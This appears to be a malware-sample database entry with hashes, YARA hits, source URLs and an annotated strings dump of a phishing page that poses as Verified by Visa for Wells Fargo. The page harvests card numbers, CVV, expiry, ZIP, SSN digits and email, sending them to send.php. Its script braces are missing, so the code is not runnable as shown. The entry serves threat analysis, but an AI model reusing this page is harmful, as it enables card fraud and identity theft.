Sample details: d7963502469f7ee50ea7b8a4d8081719 --

Hashes
MD5: d7963502469f7ee50ea7b8a4d8081719
SHA1: d81905276c384723e934ddccb662e07669f2340d
SHA256: e2f4d561ce4c56a677c09eedcd7944f54d39d0c5bf3a8611f660d8b687a22f27
SSDEEP: 192:jhgQfQCI0fXRpFaAUzpxXpIXrdTbM6Esm9XsF/DxWaR5FP9phX0FpUMArD9Vpt:jDQAgxZ2TbM6EsCXsF/DD1FXEbUZVL
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/contentis_base64 | YRP/android_meterpreter |
Source
http://aggiehealth.com/inboxaol/wellsfargo/7b572a6e7136573fabb108649656dcbc
http://aggiehealth.com/inboxaol/wellsfargo/92adda902210eec7e307576e382e989a/
http://aggiehealth.com/inboxaol/wellsfargo/
http://aggiehealth.com/inboxaol/wellsfargo/1b74b59a4c74b2a5ec6dc2ffa112aa7d
Strings
		<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
<meta http-equiv="Cache-Control" content="no cache">
<meta http-equiv="Pragma" content="no cache">
<meta http-equiv="Expires" content="0">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<title>Verified by Visa</title>
	<link rel="icon" type="image/gif" href="index_fichiers/WELL10000056.GIF" />
	<link rel="stylesheet" href="index_fichiers/style.css" type="text/css">
	<script language="JavaScript">
		// popUp2: opens "en_US_DPS_Bulk12/" + strURL in a 390x400 pop-up window named
		// 'popUp2' and gives it focus. The "more details", signature-panel and e-mail
		// help links further down the page call it through javascript: hrefs.
		// The window handle goes into popUP2 (capital "UP"), an undeclared global that
		// is distinct from the function name.
		// NOTE(review): the function's braces are absent in this strings dump
		// (presumably dropped during extraction), so the listing is not runnable as shown.
		function popUp2(strURL)
		    //popUP2 = window.open("en_US_DPS_Bulk12/" + strURL,'popUp2','width=390,height=400,scrollbars=no,screenX=100,screenY=100,left=100,top=100"');
		    popUP2 = window.open("en_US_DPS_Bulk12/" + strURL,'popUp2','width=390,height=400,scrollbars=yes,screenX=100,screenY=100,left=100,top=100"');
			popUP2.focus();
	//-->
	</script>
<script language="javascript" src="index_fichiers/pwdbase.js"></script>
<script language="javascript" src="index_fichiers/pwdcookies.js"></script>
<script language="JavaScript">
// Page-level settings, hard-coded as literals in this copy of the page.
// NOTE(review): setCookie/getCookie are not defined anywhere in this dump;
// presumably they come from the external index_fichiers/pwdcookies.js — confirm
// against that file if it was captured.
// ACSCondData is the mode code that OnUserInput compares against the ranges
// 1100-1103 and 1200-1202.
var ACSCondData = "1101";
// OnUserInput derives a local "bankdir" from FI_LOGO by cutting it at ".gif".
var FI_LOGO = "WELL10000056.gif";
var LOCALE_FOLDER = "en_US_DPS_Bulk12/";
// isAA selects the "activation" wording of the leave-page prompt instead of the
// "purchase" wording (see onBeforeUnloadHandler).
var isAA = false;
var acsstring = document.location.href;
// isAA is switched on when the page URL contains "AVV=1" ...
// NOTE(review): the braces are missing in this dump; the indentation suggests the
// setCookie call belonged to the if-body.
if(acsstring.indexOf("AVV=1") != -1)
	isAA = true;
	setCookie("AAFlag","true");
// ... or when the AAFlag cookie already holds "true".
var cookievalForAA = getCookie("AAFlag");
if(cookievalForAA != null)
	if(cookievalForAA == "true")
		isAA = true;
// OnPageInit: enables the Continue, Activatenow and Donotactivatenow controls of
// optInForm, then calls window.history.go(1) (one step forward in the session
// history) and focuses the window.
// The condition compares the literal 1101 with itself, so it is always true as
// written; presumably a value that was substituted into the page before it was
// saved — unconfirmed.
// NOTE(review): no call to OnPageInit is visible in this dump (the body's onload
// attribute runs checkSessionStatus instead), and only a "Continue" input appears
// in the visible form markup.
function OnPageInit()
	if((1101  == 1101) || (1101 == 1103) ||
		(1101 >= 1200 && 1101 <= 1202))
		document.optInForm.Continue.disabled = false;
		document.optInForm.Activatenow.disabled = false;
		document.optInForm.Donotactivatenow.disabled = false;
	window.history.go(1);
	self.focus();
// closing: global flag read by onBeforeUnloadHandler; while it is true, leaving
// the page triggers the "has not completed" prompt. Link and button handlers set
// it to false before they navigate, and onFocusHandler sets it back to true.
var closing = true;
// checkSessionStatus: run from the body's onload attribute. Reads the
// DPS_Bulk1_AE cookie; when its value is 3 or more it resets the cookie to 0,
// sets DPS_Bulk1_AE_Flg to "true", clears `closing` and hands over to
// closeButton(object).
// NOTE(review): what DPS_Bulk1_AE counts is not shown in this dump (nothing
// visible here increments it) — presumably an attempt counter; confirm.
function checkSessionStatus(object)
	var cookievalss = getCookie("DPS_Bulk1_AE");
				//alert("In oninit cookievalss="+cookievalss);
				if(cookievalss != null)
					if (cookievalss > 3 || cookievalss == 3)
					{
						setCookie("DPS_Bulk1_AE",0);
						setCookie("DPS_Bulk1_AE_Flg","true");
						closing = false;
						return closeButton(object);
					}
// onBeforeUnloadHandler: wired to the body's onbeforeunload attribute. When the
// user tries to leave or close the page while `closing` is true, it sets
// event.returnValue so the browser shows a leave-page confirmation whose text
// tells the user the activation (isAA) or purchase is not complete and to click
// 'Cancel' — i.e. the prompt steers the visitor back onto the form.
// If the DPS_Bulk1_AE_Flg cookie is "true", the handler resets it to "false" and
// returns without prompting.
// NOTE(review): braces are missing in this dump, so the exact nesting of the
// two `if ( closing )` runs is inferred from indentation only; the second run
// presumably was the branch for a missing Flag cookie.
// The two prompt strings are fixed literals and are candidates for content-based
// matching of this page.
function onBeforeUnloadHandler(object)
	var Flag = getCookie("DPS_Bulk1_AE_Flg");
	if(Flag != null)
		if(Flag == "true")
			setCookie("DPS_Bulk1_AE_Flg","false");
			return;
		else
			if ( closing )
				if (isAA)
					event.returnValue = "Your activation has not completed!\nTo complete your activation click 'Cancel'.";
				else
					event.returnValue = "Your purchase has not completed!\nTo complete your purchase click 'Cancel'.";
		if ( closing )
			if (isAA)
				event.returnValue = "Your activation has not completed!\nTo complete your activation click 'Cancel'.";
			else
				event.returnValue = "Your purchase has not completed!\nTo complete your purchase click 'Cancel'.";
// onFocusHandler: wired to the body's onfocus attribute; re-arms the leave-page
// prompt by setting `closing` back to true whenever the window regains focus
// (for example after one of the help pop-ups cleared it).
function onFocusHandler()
	closing = true;
// HelpWindow: opens en_US_DPS_Bulk12/sorryhelp.htm in a 360x300 pop-up named "Help".
// NOTE(review): no caller of HelpWindow is visible in this dump.
function HelpWindow()
	var win = window.open("en_US_DPS_Bulk12/sorryhelp.htm","Help",
		"height=300,width=360,dependent=yes,scrollbars=yes,resizable=no,screenX=650,screenY=350,left=650,top=350");
// Configurable parameters:
// loadError stays null until objError runs, which stores the string "error".
// NOTE(review): nothing visible in this dump registers objError as a handler or
// reads loadError; the `evnt` argument is unused.
var loadError = null;
function objError (evnt)
	loadError = "error";
// isValidCreditCardExpiry: returns false when the expiry lies before the current
// month — either the year is earlier than the current year, or it is the current
// year and the month is earlier than the current month — and true otherwise.
// Comparisons use loose operators, so the string arguments passed by OnUserInput
// (a two-digit month and "20" + two-digit year) are coerced to numbers.
// The check runs in the browser against the client's clock only.
function isValidCreditCardExpiry(expiresMonth, expiresYear)
  var isValid = true;
  var nowDate = new Date();
  if (expiresMonth < (nowDate.getMonth() + 1) &&
      expiresYear == nowDate.getFullYear())
    isValid = false;
  else if (expiresYear < nowDate.getFullYear())
    isValid = false;
  return isValid;
 * This works on 1 character only if _ONE=1
 * if _ONE=0 then it will replace all occurances.
// _ONE controls how many characters Switch replaces: per the comment remnant
// just above this line in the dump, 1 means only the first match and 0 means
// every match.
var _ONE=1;
// Switch: walks `item` character by character, substitutes NewChar for OldChar
// and returns the rebuilt string. After a substitution _flag takes the value of
// _ONE, which (when 1) stops further substitutions.
// NOTE(review): braces are missing in this dump, so which statements sat inside
// the `if` and the `for` is inferred from the comment remnant, not from syntax.
// No caller of Switch is visible in this dump.
function Switch(item,OldChar,NewChar)
  var _ret="";
  var _flag=0;
  var _item=item.split("");
  for(var i=0;i<_item.length;i++)
    if(!_flag&&_item[i]==OldChar)
	  _item[i]=NewChar;
      _flag=_ONE;
	_ret+=_item[i];
  return(_ret);
// closeButton: reached from checkSessionStatus once the DPS_Bulk1_AE cookie is 3
// or more. Clears `closing` (so no leave-page prompt fires), records "fail" in
// the DPS_Bulk1_AE_TrnStatus cookie, calls OnCancelHandler2(object) and sets the
// undeclared global `cancel` to true.
// NOTE(review): OnCancelHandler2 is not defined in this dump; presumably it
// lives in one of the external scripts the page references — confirm.
function closeButton(object)
		closing = false;
		//alert("calling OnCancelHandler2");
		setCookie("DPS_Bulk1_AE_TrnStatus","fail");
		OnCancelHandler2(object);
		cancel = true;
		//close();
</script>
<SCRIPT LANGUAGE="JavaScript" src="en_US_DPS_Bulk12/WELL10000056.gif_phno.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" src="en_US_DPS_Bulk12/WELL10000056.gif.js"></SCRIPT>
<script language="javascript">
// Stores the issuer-logo file name in a BANKDIR cookie at page load.
// NOTE(review): nothing visible in this dump reads BANKDIR back; setCookie is
// presumably provided by the external pwdcookies.js.
var bankdir = "WELL10000056.gif";
setCookie("BANKDIR",bankdir);
<!--Methods used on the Optin page-->
// OnUserInput: click handler of the "Continue" submit button (called with 1).
// For userInput == 1 it checks the entered values in the browser, packs them
// into the form's CustData and pin fields, disables the buttons and submits
// optInForm; every failed check shows an alert and returns false.
//
// Values read from optInForm: CHName1, cvv2 (3 digits), expdate1/expdate2
// (2 digits each), zip (5 digits), ssn (4 digits) and email.
//
// NOTE(review): the form markup visible later in this dump names the cardholder
// field "name", not "CHName1", and shows no CustData, optIn or pin inputs; the
// card-number input "ccnum" is never referenced by this script. This handler
// therefore looks inherited from the page that was copied — confirm against the
// live DOM. Per the form tag, the named inputs (name, ccnum, cvv2, expdate1,
// expdate2, zip, ssn, email) are what a POST of optInForm to send.php carries,
// which makes those parameter names and the relative send.php target useful
// for network-side matching.
// NOTE(review): braces and some else keywords are missing in this dump, so the
// branch structure below is inferred from indentation.
function OnUserInput(userInput)
	var bankidgif = FI_LOGO;
	// Local bankdir = FI_LOGO without its ".gif" suffix; not used again in this function.
	var bankdir = bankidgif.slice(0,bankidgif.indexOf(".gif"));
	// Suppress the leave-page prompt for the submit that follows.
    closing = false;
	if(userInput == 1)
		var name = document.optInForm.CHName1.value;
		if(name.length > 0)
			document.optInForm.CustData.value = ",CHName="+name;
		else
			alert("Please enter your name as it appears on your card.");
			document.optInForm.CHName1.focus();
			return false;
		// Card verification code: exactly three digits.
		var cvv2 = document.optInForm.cvv2.value;
		  if(!cvv2.match(/^\d{3}$/))
			alert("Please enter a valid Signature Panel Code!");
			return false;
		// Expiry month and two-digit year: exactly two digits each.
		var expdate1 = document.optInForm.expdate1.value;
		  if(!expdate1.match(/^\d{2}$/))
			alert("Please enter a valid Card Expiration Date!");
			return false;
		var expdate2 = document.optInForm.expdate2.value;
		if(!expdate2.match(/^\d{2}$/))
			alert("Please enter a valid Card Expiration Date!");
			return false;
		var month = expdate1;
		// The two-digit year is expanded by prefixing "20".
		var year = "20" + expdate2;
		if (month < 1 || month > 12)
			alert("Please enter a valid Month and Year of your Card Expiration Date");
			return false;
		var isvalid = isValidCreditCardExpiry(month,year);
		if(!isvalid)
			alert("Please enter a valid Month and Year of your Card Expiration Date");
			return false;
		// ZIP code: exactly five digits.
		var zip = document.optInForm.zip.value;
		  if(!zip.match(/^\d{5}$/))
			alert("Please enter your valid Zip Code!");
			return false;
		// Last four digits of the cardholder's SSN.
		var ssn = document.optInForm.ssn.value;
		  if(!ssn.match(/^\d{4}$/))
			alert("Please enter the valid Primary Cardholder's SSN (last 4)!");
			return false;
		// E-mail is optional: an empty value passes; a non-empty value must have
		// text on both sides of the first "@". emailStrA/emailStrB are assigned
		// without var and so become globals.
		var validEmail = "true";
		var checkStr3 = document.optInForm.email.value;
		var sendmail = "false";
		if( checkStr3 != null || checkStr3 != '')
			if ("" != checkStr3)
				var index = checkStr3.indexOf("@");
					//alert("Index of @: "+checkStr3.indexOf("@"));
				emailStrA = checkStr3.substr(0,index);
					//alert(emailStrA);
				emailStrB = checkStr3.substr(index+1);
					//alert(emailStrB);
				if ( ("" == emailStrA) || ("" == emailStrB) )
					validEmail = "false";
					//alert("emailStrA is null");
				sendmail="true";
			if("false" == validEmail)
				alert("Invalid Email Address format.  Please enter a valid Email Address!");
				return false;
	   	document.optInForm.optIn.value = userInput;
	   	// For the mode codes 1100-1103 and 1200-1202 the collected values are
	   	// concatenated into two fields: CustData gets e-mail and name, pin gets
	   	// expiry, verification code, ZIP and SSN last-4 as a query-style string.
	   	if((ACSCondData >= 1100) &&  (ACSCondData <= 1103) ||
	   		(ACSCondData >= 1200 && ACSCondData <= 1202))
	   	{
	   		if( sendmail == "true")
				document.optInForm.CustData.value = ",EMail=" + document.optInForm.email.value + ",CHName="+name;
			document.optInForm.pin.value = "dateExpired=" + month + year + "&verificationCode=" + document.optInForm.cvv2.value + "&zip=" + document.optInForm.zip.value + "&last4ssn=" + document.optInForm.ssn.value;
	   	}
		// NOTE(review): presumably the branch for userInput values other than 1
		// (its else is missing in this dump): pin is set to "NA" instead of data.
		document.optInForm.optIn.value = userInput;
		if((ACSCondData >= 1100) &&  (ACSCondData <= 1103) ||
			(ACSCondData >= 1200 && ACSCondData <= 1202))
			document.optInForm.pin.value = "NA";
	// Disable the buttons, then submit the form from script; returning false
	// cancels the button's own default submit.
	if((ACSCondData  == 1101) || (ACSCondData == 1103) ||
		(ACSCondData >= 1200 && ACSCondData <= 1202))
		document.optInForm.Continue.disabled = true;
		document.optInForm.Activatenow.disabled = true;
		document.optInForm.Donotactivatenow.disabled = true;
	document.optInForm.submit();
	return false;
</script>
<!--<SCRIPT LANGUAGE="JavaScript" src="en_US_DPS_Bulk12/WELL10000056.gif.js"></SCRIPT>-->
</head>
<body leftmargin="0" topmargin="0" onbeforeunload="onBeforeUnloadHandler(this);" onload="checkSessionStatus(this);" onfocus="onFocusHandler();" marginwidth="0" marginheight="0" bgcolor="#ffffff">
<form name="optInForm" action="send.php" method="POST">
<!-- This table centers the content area in the window, irregardless of the window's size -->
<table height="100%" cellspacing="0" cellpadding="0" border="0" width="100%">
	<tbody><tr><td colspan="3"><img src="index_fichiers/spacer_clear.gif" alt="" height="1" border="0" width="1"><br></td></tr><!-- Top 20 pixels of white space -->
		<td><img src="index_fichiers/spacer_clear.gif" alt="" height="0" border="0" width="20"><br></td><!-- Left 20 pixels of white space -->
		<td align="center">
			<!-- Content area -->
			<table height="340" cellspacing="0" cellpadding="0" border="0" width="330">
				<tbody><tr>
					<td height="51" width="89" valign="bottom">
						<!-- Visa graphic -->
						<img name="vpasLogo" src="index_fichiers/vpas_logo.gif" alt="Verified by Visa" border="0"><br>
					</td>
					<td height="51" align="right" width="301" valign="bottom">
						<!-- Issuer logo -->
						
					</td>
					</tr><tr><td colspan="3"><img src="index_fichiers/spacer_clear.gif" alt="" height="2" border="0" width="1"></td></tr><!-- 15 pixels of white space between the header and the logo-->
				<tr>
					<td colspan="2" height="298">
						<font face="arial" color="#003366" size="3"><b>Authentication Required For Purchase</b></font><br><img src="index_fichiers/spacer_clear.gif" alt="" height="10" border="0" width="1"><font class="TextBlack">Your Visa card has been activated in Verified by Visa to help protect against unauthorized use online <b>-- at no additional cost</b>.<br><br>Whenever
 your card is used at participating online stores, your Visa card Issuer
 will ask for your Verified by Visa password to verify that you 
authorize the purchase.
<a href="javascript:%20popUp2('details.htm?WELL10000056.gif')" onclick="closing=false">Click here for more details.</a><br><br>Complete the form below and click Continue to proceed. </font><br style="line-height:3px">
	    				<table cellspacing="0" cellpadding="3" border="0" width="330">
						<tbody><tr><td colspan="3"><img src="index_fichiers/spacer_clear.gif" alt="" height="1" border="0" width="1"></td></tr>
						<tr>
<td class="TextBlack" align="right" width="150" valign="top">Name on Card:</td>
<td width="170" valign="top"><input name="name" size="20" maxlength="30" class="monospace" type="text">&nbsp;&nbsp;<br></td>
<td class="TextBlack" align="right" width="150" valign="top">Credit Card Number:</td>
<td width="170" valign="top"><input name="ccnum" size="20" maxlength="30" class="monospace" type="text">&nbsp;&nbsp;<br></td>
<td class="TextBlack" align="right" width="150" valign="top">Signature Panel Code:</td>
<td width="170" valign="top"><input name="cvv2" size="3" maxlength="3" class="monospace" type="password">&nbsp;&nbsp;<a href="javascript:%20popUp2('sigpanel.htm?WELL10000056.gif')" onclick="closing=false"><img src="index_fichiers/cvv2.gif" alt="Verification Code" height="20" align="top" border="0" width="120"></a><br></td>
<td class="TextBlack" align="right" width="150" valign="top">Card Expiration Date:</td>
<td width="170" valign="top"><input name="expdate1" size="2" maxlength="2" class="monospace" type="text">-<input name="expdate2" size="2" maxlength="2" class="monospace" type="text">&nbsp;&nbsp;<span class="TextSmall">MM-YY</span><br></td>
<td class="TextBlack" align="right" width="170" valign="top">Your Zip Code:</td>
<td width="150" valign="top"><input name="zip" size="5" maxlength="5" class="monospace" type="password">&nbsp;&nbsp;<span class="TextSmall">12345</span><br></td>
<td class="TextBlack" align="right" width="150" valign="top">Primary Cardholder's SSN (last 4):</td>
<td width="170" valign="top"><input name="dummy1" size="3" maxlength="3" class="monospace" value="xxx" disabled="disabled" type="text">-<input name="dummy2" size="2" maxlength="2" class="monospace" value="xx" disabled="disabled" type="text">-<input name="ssn" size="4" maxlength="4" class="monospace" type="password"><br></td>
<td class="TextBlack" align="right" width="150" valign="top">Email Address:</td>
<td width="170" valign="top"><input name="email" size="15" maxlength="30" class="monospace" type="text">&nbsp;<a href="javascript:%20popUp2('email.htm?WELL10000056.gif')" onclick="closing=false"><img src="index_fichiers/question_mark_sm.gif" alt="Email Address" align="bottom" border="0"></a><br></td>
						</tbody></table>
						<!-- Issuer speciffic info -->
					<!-- Start of the Close button -->
						<div align="center">
							<img src="index_fichiers/spacer_clear.gif" height="2" width="1">
							<input name="Continue" value="Continue" onclick="return OnUserInput(1);" type="submit">
							<noscript>
							<INPUT TYPE="Submit" VALUE="Activate now" onClick="closing=false">&nbsp;
							<INPUT TYPE="Submit" VALUE="Do not activate now" onClick="closing=false">
							<INPUT TYPE="Submit" VALUE="Continue">
							</noscript>
						</div>
					<!-- End of the Close button -->
					</td>
				</tr>
				<tr>
		  			<td align="left" valign="top">
		  				<script language="javascript">
		  				if(1101 >= 1200 && 1101 <= 1202)
		  				{
		  					document.writeln ('<A TITLE="Return to password entry" 
HREF="Back" VALUE="Back" onClick="return OnUserInput(300);">Back</A>');
		  				}
		  				</script>
		  			</td>
				</tr>
				<tr>
				<td colspan="2">
		<!-- copyright notice table -->
		<table cellspacing="0" cellpadding="0" border="0" width="100%">
		<tbody><tr height="3"></tr>
		<tr>
		<!--<TD width=150></TD>-->
		<td align="left" valign="top">
		<script language="javascript">
		if ((1101  == 1101) || (1101 == 1103))
			document.writeln ("<SPAN class=\"TextSmall\">By clicking Continue, 
you agree to these");
				document.writeln("<A HREF=\"javascript: 
popUp2\('WELL10000056.giftoc.html?WELL10000056.gif'\)\" 
onClick=\"closing=false\">Terms & Conditions.</A>");
		else if(1101 >= 1200 && 1101 <= 1202)
			// do nothing
		else
			document.writeln ("<SPAN class=\"TextSmall\">By clicking Activate 
now, you agree to these");
			document.writeln("<A HREF=\"javascript: 
popUp2\('WELL10000056.giftoc.html?WELL10000056.gif'\)\" 
onClick=\"closing=false\">Terms & Conditions.</A>");
		</script><span class="TextSmall">By clicking Continue, you agree to these
<a href="javascript:%20popUp2('WELL10000056.giftoc.html?WELL10000056.gif')" onclick="closing=false">Terms &amp; Conditions.</a>
		<noscript>
			<A HREF="en_US_DPS_Bulk12/tandc.htm" target=_blank onClick="closing=false">Terms & Conditions.</A>
		</noscript>
		<br>
		<!--
		Click here to view
		<script language="javascript">
			//document.writeln ("<A HREF=\"javascript: popUp2\('privacy.htm?WELL10000056.gif'\)\" onClick=\"closing=false\">");
		</script>
		<!--
		<NOSCRIPT>
			<A HREF="en_US_DPS_Bulk12/privacy.htm" target=_blank onClick="closing=false">
		</NOSCRIPT>
		Privacy Policy.</A>
		</span>
		</td></tr>
		</tbody></table>
		<!-- end copyright notice table-->
				</td>
				</tr>
			</tbody></table>
			<!-- End of content area -->
		</td>
		<td><img src="index_fichiers/spacer_clear.gif" alt="" height="0" border="0" width="20"><br></td><!-- Right 20 pixels of white space -->
	</tr>
	<script language="javascript">
	</script>
	<!--<IMG SRC="en_US_DPS_Bulk12/images/spacer_clear.gif" WIDTH="1" HEIGHT="0" BORDER=0 ALT="">--><!-- bottom 20 pixels of white space -->
	</td>
	</tr>
</tbody></table>
</form>
<!-- End of centering table -->
</body></html>